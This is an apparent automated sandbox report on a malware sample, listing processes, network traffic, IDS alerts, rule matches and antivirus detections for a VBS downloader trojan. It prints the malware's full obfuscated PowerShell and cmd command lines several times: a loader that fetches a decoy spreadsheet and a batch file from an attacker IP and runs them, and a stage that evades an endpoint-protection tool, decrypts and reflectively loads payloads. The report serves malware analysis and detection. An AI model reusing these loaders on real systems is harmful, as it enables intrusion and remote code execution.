Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 9, 2024, 11 a.m. | May 9, 2024, 11:07 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH 
$wYVYeSi;};;;;}nvpRDaZuFdMv;
2668-
EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
2836 -
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 
5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
1356 -
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2164
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
193.222.96.124 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 193.222.96.124:7287 -> 192.168.56.101:49168 | 2400036 | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 | Misc Attack |
TCP 192.168.56.101:49163 -> 193.222.96.124:7287 | 2027254 | ET INFO Dotted Quad Host XLSX Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID |
file | C:\Users\test22\AppData\Roaming\111.xlsx |
file | C:\Users\test22\AppData\Roaming\~$111.xlsx |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk |
file | C:\Users\test22\AppData\Roaming\xD.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\111.xlsx.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\111.xlsx.LNK |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 
5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); " |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH $wYVYeSi;};;;;}nvpRDaZuFdMv; |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH 
$wYVYeSi;};;;;}nvpRDaZuFdMv; |
cmdline | C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat" |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Data received | HTTP/1.1 200 OK |
Data received | Content-Length: 9893 Content-Type: application/octet-stream Connection:close PK ! bîh^ [Content_Types].xml ¢( ¬ËNÃ0E÷HüCä-Jܲ@5íÇ*Q>ÀÄƪc[iiÿûB¡j7±ÏÜ{2ñÍh²nm¶Æ»RÈÀU^7/ÅÇì%¿rZYï @1__f q·ÃR4DáAJ¬h>ãÚÇVßƹªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I"{Üv^¥P!XS)bR¹rúK¾s(¸3Õ`cÞ0½ÝÎß»¾7M4²©ôªZÆk+¿|\|z¿(ôPúº6h_-[@!ÒØ Pk´2nÏ}Ä?£LËð Ýû%áÄßdºdN"m,à¥ÇDO97*~§Èɸ8ÀOíc|n¦ÑäEøÿöéºóÀBÉÀ!$}íàÈé;{ìÐå[îñé2þ ÿÿ PK ! µU0#ô L _rels/.rels ¢( ¬MOÃ0ïHüÈ÷ÕÝBKwAH»!T~Iܵ£$Ý¿'TG½~üÊÛÝ<êÈ!öâ4¬;#¶wúqu*&rFq¬áÄvÕõÕöGJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥=ZÆMYÞbø®ÕBSí°·7 êÏצé ?9LìÒÈsbgÙ®|Èl!õùUSh9i°br:"y_dlÀóD¿ý|-NÈR"4ø2ÏGÇ% õZ´4ñËyÄ7 ëÈðÉ¨Þ ÿÿ PK ! µñ Íù Ñ xl/workbook.xml¬UÛn£0}_iÿù w5©j#uWU¯/V8Á `Ö6Mªªÿ¾cé%/ÝvøÂã33ÇÃéÙ®,*$ãÕá´JyƪõÝÞ!2¤"UF ^Ñ!z¤¾;Ýr±Yr¾1 C+UÇ%ÓDðV`YqQS±¶d-(ÉdN©*˱mß* «P`ðÕ¥4áiSÒJu D}³Zöheú¸MS)/kX²©ÇeÏ×dYÛ;ì;·¶¡qúÀt´UÉRÁ%_©¶:ÒGþcÛÂøMvÇ1øk úÀt¬ÿIVþËÃöÑ0H«ÕJ |
Data received | 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 |
Data received | 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 |
Data sent | GET /111.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive |
Data sent | GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287 |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 193.222.96.124 |
file | C:\Users\test22\AppData\Roaming\111.xlsx |
file | C:\Users\test22\AppData\Roaming\xD.bat |
cve | CVE-2013-3906 |
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\111.xlsx | ||||||
parent_process | powershell.exe | martian_process | "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\xD.bat" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\xD.bat |
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Cynet | Malicious (score: 99) |
Skyhigh | HTA/Downloader.f |
ALYac | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
ESET-NOD32 | VBS/Agent.QVR |
McAfee | HTA/Downloader.f |
Avast | Script:SNH-gen [Drp] |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
MAX | malware (ai score=84) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |